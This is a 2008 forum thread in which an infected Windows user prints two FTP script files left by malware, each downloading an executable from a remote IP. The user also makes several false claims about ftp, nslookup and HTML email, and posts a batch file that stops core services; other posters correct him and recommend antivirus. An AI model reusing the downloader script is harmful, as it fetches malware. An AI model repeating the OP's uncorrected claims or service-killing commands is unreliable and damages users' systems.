*** VIRUS WARNING!!! ***

  • Thread starter Thread starter Terry Mester
  • Start date Start date
T

Terry Mester

I have discovered how Spammers are able to access people's Computers to spew
out their Spyware garbage, and it is Microsoft's OS which has made this
possible! Spammers utilize two commands: the "nslookup" Command and the
"ftp" Command found in c:\winnt\system32 -- which you can review in the
Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
Computer while logged onto the Internet to download a Virus. Those E-Mails
you get from friends telling you to forward it on to others, in order to get
good luck or money, are nothing but a SCAM perpetrated by the Spammers!
DELETE those E-Mails -- DO NOT open them!!! Last month after separately
opening two of those E-Mails, I ended up with a Virus on my Computer spewing
out data over the Internet, and also the following two Text Files given the
name "i" under the 'winnt' Directory.
--- \winnt\i
open 136.145.69.79 2755
user 1 1
get kp.exe
quit
--- \winnt\i
open 208.111.5.228 2755
user 1 1
get 2k3.exe
quit
---
The Virus Commands I subsequently found under the 'winnt' or 'system32'
Directories corresponded to the two ".exe" Files named in those two Text
Files. I didn't know where those 4 Command Lines in those "i" Files were
executable until just today when I looked up the "ftp" Command in Help.
Those are 4 sub-commands which caused my Computer to open up the said IP
Address and Port#, log in as the user 1 1, download the Virus Command, and
then quit "ftp". Since I'm a Dial-up user, I immediately noticed something
wrong because this immediately clogged up my Internet Connection. A High
Speed user might not notice anything!

It is unbelievable, but the "ftp" Command enables the Spammer to log onto
your Computer WITHOUT using an ID and Password! Further, "ftp" enables the
Spammer to prevent you from seeing what it is doing on your Computer!!! I'm
not kidding! Further still, the "nslookup" Command enables the Spammer to
find out your IP Numbers and Computer ID so that he can use the "ftp"
Command! It is as if Microsoft specifically designed these two Commands to
help Spammers! As far as I can tell, you cannot disable either of these
Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to
"nslookup.exe.rename" in order to make them non-executable, but I don't think
this will solve the problem. Would a Microsoft Corporation technician please
inform us if these two Command functions can be disabled? If not, Microsoft
needs to IMMEDIATELY provide a Service Pack or update to enable these two
functions to be disabled using the "net stop / start" Command. With these
functions disabled, a Firewall Application becomes completely unnecessary!
 
YOU are probably one of those detestable Spammers, and you're worried that
I've discovered your technique!
 
Terry Mester said:
I have discovered how Spammers are able to access people's Computers to
spew
out their Spyware garbage, and it is Microsoft's OS which has made this
possible! Spammers utilize two commands: the "nslookup" Command and the
"ftp" Command found in c:\winnt\system32 -- which you can review in the
Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
Computer while logged onto the Internet to download a Virus. Those
E-Mails
you get from friends telling you to forward it on to others, in order to
get
good luck or money, are nothing but a SCAM perpetrated by the Spammers!
DELETE those E-Mails -- DO NOT open them!!!

The problem is not ftp.exe or nslookup.exe - it's the stuff you
received from "friends", promising you "luck" or "money". You
need to become a little more computer-savvy: Don't open
attachments sent by strangers, and be very careful when opening
attachments sent by friends. Chances are that they haven't got
the faintest idea about the stuff they're sending about: Fun programs,
screen savers, elaborate "jokes" - all of them can spell trouble.

Renaming ftp.exe or nslookup.exe is pointless. Change your habits
and install/maintain a good virus scanner.
 
From: "Terry Mester" <[email protected]>

| I have discovered how Spammers are able to access people's Computers to spew
| out their Spyware garbage, and it is Microsoft's OS which has made this
| possible! Spammers utilize two commands: the "nslookup" Command and the
| "ftp" Command found in c:\winnt\system32 -- which you can review in the
| Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
| Computer while logged onto the Internet to download a Virus. Those E-Mails
| you get from friends telling you to forward it on to others, in order to get
| good luck or money, are nothing but a SCAM perpetrated by the Spammers!
| DELETE those E-Mails -- DO NOT open them!!! Last month after separately
| opening two of those E-Mails, I ended up with a Virus on my Computer spewing
| out data over the Internet, and also the following two Text Files given the
| name "i" under the 'winnt' Directory.
| --- \winnt\i
| open 136.145.69.79 2755
| user 1 1
| get kp.exe
| quit
| --- \winnt\i
| open 208.111.5.228 2755
| user 1 1
| get 2k3.exe
| quit
| ---
| The Virus Commands I subsequently found under the 'winnt' or 'system32'
| Directories corresponded to the two ".exe" Files named in those two Text
| Files. I didn't know where those 4 Command Lines in those "i" Files were
| executable until just today when I looked up the "ftp" Command in Help.
| Those are 4 sub-commands which caused my Computer to open up the said IP
| Address and Port#, log in as the user 1 1, download the Virus Command, and
| then quit "ftp". Since I'm a Dial-up user, I immediately noticed something
| wrong because this immediately clogged up my Internet Connection. A High
| Speed user might not notice anything!
|
| It is unbelievable, but the "ftp" Command enables the Spammer to log onto
| your Computer WITHOUT using an ID and Password! Further, "ftp" enables the
| Spammer to prevent you from seeing what it is doing on your Computer!!! I'm
| not kidding! Further still, the "nslookup" Command enables the Spammer to
| find out your IP Numbers and Computer ID so that he can use the "ftp"
| Command! It is as if Microsoft specifically designed these two Commands to
| help Spammers! As far as I can tell, you cannot disable either of these
| Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to
| "nslookup.exe.rename" in order to make them non-executable, but I don't think
| this will solve the problem. Would a Microsoft Corporation technician please
| inform us if these two Command functions can be disabled? If not, Microsoft
| needs to IMMEDIATELY provide a Service Pack or update to enable these two
| functions to be disabled using the "net stop / start" Command. With these
| functions disabled, a Firewall Application becomes completely unnecessary!

This is NOT new an is well known in the anti malware community.

What you have decscribed is a BOT action. If it is on the PC, the PC is already infected.

The infector creates a script and uses the FTP command to download its peer software. A
batch file then uses the script to automate the FTP process.

If file protection is properly working, you can not rename FTP.EXE as it will just reinstate
itself.

NSLOOKUP has nothing to do with it.

What this shows is that you did not have anti virus installed and/or prioperly updated.

BTW: Microsoft is fully aware of the situation and I guarantee you that there will be no
patch because you have to be infected first before the FTP.EXE command will be used
maliciously. You shoud also know there are Trojans that hijack the BITS Service to download
peers.
 
Pegasus (MVP) 3/31/2008 2:47 AM PST
"You need to become a little more computer-savvy: Don't open attachments
sent by strangers, and be very careful when opening attachments sent by
friends. ... Renaming ftp.exe or nslookup.exe is pointless. Change your
habits and install/maintain a good virus scanner. "

I was not referring to opening "executable" E-Mail Attachments (.exe, .com,
..bat, .cmd). I'm talking about the abilities of an HTML (as opposed to Plain
Text) E-Mail. Within about 3 Seconds of "viewing" an HTML E-Mail, it has the
ability to create a Text File on the Hard Drive -- as with the two Files
above. You don't need to open any type of Attachment. It is unsafe to even
LOOK at these Junk E-Mails! I now know better, and I'm simply warning
others. As for a Virus Scanner / Firewall, I have a Pentium III Computer,
and it slows my Computer down too much and so I had to disable it. This
problem is the exclusive fault of Microsoft who has produced defective
security protocols in its Operating Systems -- unlike Apple and Linux!

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
" The infector creates a script and uses the FTP command to download its
peer software. "

I know this. The point of this Thread is to warn people that an HTML E-Mail
(Body) can create this Script Text File -- you don't have to open any
Attachment, and I didn't open any!

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
" If file protection is properly working, you can not rename FTP.EXE as it
will just reinstate itself. "

You are 100% correct. I only realized this after posting this Thread.

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
" NSLOOKUP has nothing to do with it."

In my personal case, nslookup probably wasn't used. However, nslookup would
definitely enable you to spam a specific person's Computer as long as you
know their Internet Server. If you're out to breach a specific Computer,
nslookup is what you need to do it.

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
"What this shows is that you did not have anti virus installed and/or
prioperly updated.
BTW: Microsoft is fully aware of the situation and I guarantee you that
there will be no patch because you have to be infected first before the
FTP.EXE command will be used maliciously."

As I mentioned above, I cannot install a Firewall because I only have a
Pentium III with 128M of RAM. I haven't been infected since February 21st
when I last viewed such an E-Mail. I have since been undertaking the
following measures in a Batch Command to protect my Computer before logging
onto the Internet:
net stop "remote access auto connection manager"
net stop "remote access connection manager"
net stop "routing and remote access"
net stop "remote registry service"
net stop "RPClocator"
net stop "RPCss"
net stop "messenger"
net stop "net logon"
I'm not certain how much protection this provides me. I also now generally
use the Internet only while logged into my Computer as a regular "user" and
not an "administrator".

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
"You shoud also know there are Trojans that hijack the BITS Service to
download peers."

I'm not familiar with this "BITS Service" you refer to. Can you elaborate
further?
 
Terry Mester after much thought,came up with this jewel:
Pegasus (MVP) 3/31/2008 2:47 AM PST
"You need to become a little more computer-savvy: Don't open
attachments sent by strangers, and be very careful when opening
attachments sent by friends. ... Renaming ftp.exe or nslookup.exe is
pointless. Change your habits and install/maintain a good virus
scanner. "

I was not referring to opening "executable" E-Mail Attachments (.exe,
.com, .bat, .cmd). I'm talking about the abilities of an HTML (as
opposed to Plain Text) E-Mail. Within about 3 Seconds of "viewing"
an HTML E-Mail, it has the ability to create a Text File on the Hard
Drive -- as with the two Files above. You don't need to open any
type of Attachment. It is unsafe to even LOOK at these Junk E-Mails!
I now know better, and I'm simply warning others. As for a Virus
Scanner / Firewall, I have a Pentium III Computer, and it slows my
Computer down too much and so I had to disable it. This problem is
the exclusive fault of Microsoft who has produced defective security
protocols in its Operating Systems -- unlike Apple and Linux!


You have no idea what your talking about.
There are security defects in all OSes.
________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
" The infector creates a script and uses the FTP command to download
its peer software. "

I know this. The point of this Thread is to warn people that an HTML
E-Mail (Body) can create this Script Text File -- you don't have to
open any Attachment, and I didn't open any!

set your e-mail client to "text only"
________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
" If file protection is properly working, you can not rename FTP.EXE
as it will just reinstate itself. "

You are 100% correct. I only realized this after posting this Thread.

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
" NSLOOKUP has nothing to do with it."

In my personal case, nslookup probably wasn't used. However,
nslookup would definitely enable you to spam a specific person's
Computer as long as you know their Internet Server. If you're out to
breach a specific Computer, nslookup is what you need to do it.

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
"What this shows is that you did not have anti virus installed and/or
prioperly updated.
BTW: Microsoft is fully aware of the situation and I guarantee you
that there will be no patch because you have to be infected first
before the FTP.EXE command will be used maliciously."

As I mentioned above, I cannot install a Firewall because I only have
a Pentium III with 128M of RAM.

Buy more RAM(the cost has dropped) and a NAT router(under $50 US) with
a built-in firewall.

AntiVir uses very little RAM. So does ThreatFire. GhostWall firewall is
very small also.
I haven't been infected since
February 21st when I last viewed such an E-Mail.

You need a more secure e-mail client-try Thunderbird.
I have since been
undertaking the following measures in a Batch Command to protect my
Computer before logging onto the Internet:
net stop "remote access auto connection manager"
net stop "remote access connection manager"
net stop "routing and remote access"
net stop "remote registry service"
net stop "RPClocator"
net stop "RPCss"
net stop "messenger"
net stop "net logon"
I'm not certain how much protection this provides me. I also now
generally use the Internet only while logged into my Computer as a
regular "user" and not an "administrator".

You should open services and disable from there.
________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
"You shoud also know there are Trojans that hijack the BITS Service
to download peers."

I'm not familiar with this "BITS Service" you refer to. Can you
elaborate further?

Google is your friend

max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
I was lost,but now I'm blind.
 
What's in a Name? 3/31/2008 8:46 PM PST
"Terry Mester after much thought,came up with this jewel:"

ANS: Going by this comment and the quotes you provided in your Post, I
think you are confusing the Original Poster's comments with my answers. I
had put the OPs comments in "quotes".

________________________________________
What's in a Name? 3/31/2008 8:46 PM PST
" There are security defects in all OSes. "

ANS: I'm sure that Apple and Linux have some security problems, but I'm
also sure you would agree that Microsoft has a very high number of problems.
Don't you think it should be possible to turn 'ftp' off!

________________________________________
What's in a Name? 3/31/2008 8:46 PM PST
" Buy more RAM(the cost has dropped) and a NAT router(under $50 US)"

ANS: My main problem is that my Processor is only 935 MHz. I can buy more
Memory, however, it has to be the same company brand! When I tried
installing a different brand of SIMM Memory Chip on my former Computer, the
Processor wouldn't recognize it! Can you explain that?

________________________________________
What's in a Name? 3/31/2008 8:46 PM PST
" You need a more secure e-mail client-try Thunderbird."

ANS: I have been using Thunderbird for 2 years. However, I don't think you
can expect TBird to scan the contents of an HTML Message. Those two "i" Text
Files put onto my Hard Drive were pretty benign. I now know better than to
view such a Message, and I always review my E-Mail "offline" so that nothing
can get downloaded from a Message. I believe the last time this happened to
me was from a Message on Hotmail -- which of course has to be opened
"online". I now know better than to open them. It is vitally important for
Internet users to know that you can get infected by just 'looking' at a spam
E-Mail without an Attachment, and to know that these Messages telling you to
forward it on are a new spammer technique. I might still have the original
Message on my Hotmail Account. If you're interested in scrutinizing it, I
could forward it to you.
 
From: "Terry Mester" <[email protected]>

| Pegasus (MVP) 3/31/2008 2:47 AM PST
| "You need to become a little more computer-savvy: Don't open attachments
| sent by strangers, and be very careful when opening attachments sent by
| friends. ... Renaming ftp.exe or nslookup.exe is pointless. Change your
| habits and install/maintain a good virus scanner. "
|
| I was not referring to opening "executable" E-Mail Attachments (.exe, .com,
| .bat, .cmd). I'm talking about the abilities of an HTML (as opposed to Plain
| Text) E-Mail. Within about 3 Seconds of "viewing" an HTML E-Mail, it has the
| ability to create a Text File on the Hard Drive -- as with the two Files
| above. You don't need to open any type of Attachment. It is unsafe to even
| LOOK at these Junk E-Mails! I now know better, and I'm simply warning
| others. As for a Virus Scanner / Firewall, I have a Pentium III Computer,
| and it slows my Computer down too much and so I had to disable it. This
| problem is the exclusive fault of Microsoft who has produced defective
| security protocols in its Operating Systems -- unlike Apple and Linux!


Add RAM. RAM is cheap Today!
Use anti virus, [practice Safe Hex or you will be infected again !

| ________________________________________
| David H. Lipman 3/31/2008 5:52 PM PST
| " The infector creates a script and uses the FTP command to download its
| peer software. "
|
| I know this. The point of this Thread is to warn people that an HTML E-Mail
| (Body) can create this Script Text File -- you don't have to open any
| Attachment, and I didn't open any!
|


The HTML did NOT create the BOT script.
You may have clicked on a link in the HTML that caused the malware to be installed.


| ________________________________________
| David H. Lipman 3/31/2008 5:52 PM PST
| " If file protection is properly working, you can not rename FTP.EXE as it
| will just reinstate itself. "
|
| You are 100% correct. I only realized this after posting this Thread.


I know I was.


|
| ________________________________________
| David H. Lipman 3/31/2008 5:52 PM PST
| " NSLOOKUP has nothing to do with it."
|
| In my personal case, nslookup probably wasn't used. However, nslookup would
| definitely enable you to spam a specific person's Computer as long as you
| know their Internet Server. If you're out to breach a specific Computer,
| nslookup is what you need to do it.
|


NSLOOKUP would NOT help "spam". It is purely a names resolution lookup utility and that's
all.


| ________________________________________
| David H. Lipman 3/31/2008 5:52 PM PST
| "What this shows is that you did not have anti virus installed and/or
| prioperly updated.
| BTW: Microsoft is fully aware of the situation and I guarantee you that
| there will be no patch because you have to be infected first before the
| FTP.EXE command will be used maliciously."
|
| As I mentioned above, I cannot install a Firewall because I only have a
| Pentium III with 128M of RAM. I haven't been infected since February 21st
| when I last viewed such an E-Mail. I have since been undertaking the
| following measures in a Batch Command to protect my Computer before logging
| onto the Internet:
| net stop "remote access auto connection manager"
| net stop "remote access connection manager"
| net stop "routing and remote access"
| net stop "remote registry service"
| net stop "RPClocator"
| net stop "RPCss"
| net stop "messenger"
| net stop "net logon"
| I'm not certain how much protection this provides me. I also now generally
| use the Internet only while logged into my Computer as a regular "user" and
| not an "administrator".


All you have done is cripple the OS. A completely wrong approach!


| ________________________________________
| David H. Lipman 3/31/2008 5:52 PM PST
| "You shoud also know there are Trojans that hijack the BITS Service to
| download peers."
|
| I'm not familiar with this "BITS Service" you refer to. Can you elaborate
| further?


BITS is used by the MS Auto Update process for downloading ctrical and other MS updates.

I again repeat...

Use anti virus software !

Example:
AntiVirir Free -- http://www.freeav.com

If you are unwilling to use AV software and putrchase RAM, diconnect the PC from the
Internet.
 
Terry said:
________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
"What this shows is that you did not have anti virus installed and/or
prioperly updated.
BTW: Microsoft is fully aware of the situation and I guarantee you that
there will be no patch because you have to be infected first before the
FTP.EXE command will be used maliciously."

As I mentioned above, I cannot install a Firewall because I only have a
Pentium III with 128M of RAM. I haven't been infected since February 21st
when I last viewed such an E-Mail. I have since been undertaking the
following measures in a Batch Command to protect my Computer before logging
onto the Internet:
net stop "remote access auto connection manager"
net stop "remote access connection manager"
net stop "routing and remote access"
net stop "remote registry service"
net stop "RPClocator"
net stop "RPCss"
net stop "messenger"
net stop "net logon"
I'm not certain how much protection this provides me. I also now generally
use the Internet only while logged into my Computer as a regular "user" and
not an "administrator".

Why you need to use a batch file to kill services is something only you
know, all services can be set to manual start or they can be completely
disabled if they truly are unneeded, there isn't much need to use a
batch file to kill the above services, their start behaviour can easily
be changed in the Services Management Console.

Killing RPCss is a good way to effectively cripple the Windows session,
hardly nothing works properly without this service!

John
 
Terry Mester after much thought,came up with this jewel:
What's in a Name? 3/31/2008 8:46 PM PST
"Terry Mester after much thought,came up with this jewel:"

ANS: Going by this comment and the quotes you provided in your Post,
I think you are confusing the Original Poster's comments with my
answers. I had put the OPs comments in "quotes".

________________________________________
What's in a Name? 3/31/2008 8:46 PM PST
" There are security defects in all OSes. "

ANS: I'm sure that Apple and Linux have some security problems, but
I'm also sure you would agree that Microsoft has a very high number
of problems. Don't you think it should be possible to turn 'ftp' off!

I'm not sure about turning off FTP. But about Linux security,
Here,do some light reading:
http://www.networkworld.com/newsletters/linux/2006/0501linux1.html?fsrc=
rss-virusworms
________________________________________
What's in a Name? 3/31/2008 8:46 PM PST
" Buy more RAM(the cost has dropped) and a NAT router(under $50 US)"

ANS: My main problem is that my Processor is only 935 MHz. I can
buy more Memory, however, it has to be the same company brand! When
I tried installing a different brand of SIMM Memory Chip on my former
Computer, the Processor wouldn't recognize it! Can you explain that?

I have 2 systems with 666mz/512mb running XPpro just fine.
Perhaps there are some changes needed in the BIOS?
________________________________________
What's in a Name? 3/31/2008 8:46 PM PST
" You need a more secure e-mail client-try Thunderbird."

ANS: I have been using Thunderbird for 2 years. However, I don't
think you can expect TBird to scan the contents of an HTML Message.
Those two "i" Text Files put onto my Hard Drive were pretty benign.
I now know better than to view such a Message, and I always review my
E-Mail "offline" so that nothing can get downloaded from a Message.
I believe the last time this happened to me was from a Message on
Hotmail -- which of course has to be opened "online".

I never use the web interface. I use Thunderbird to check all my mail
(hotmail,yahoo,pop3). If you need some help setting up Thunderbird, let
me know.
I now know
better than to open them. It is vitally important for Internet users
to know that you can get infected by just 'looking' at a spam E-Mail
without an Attachment, and to know that these Messages telling you to
forward it on are a new spammer technique. I might still have the
original Message on my Hotmail Account. If you're interested in
scrutinizing it, I could forward it to you.

I guess that HTML needs turned off by default in all e-mail clients.

max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
I was lost,but now I'm blind.
 
Back
Top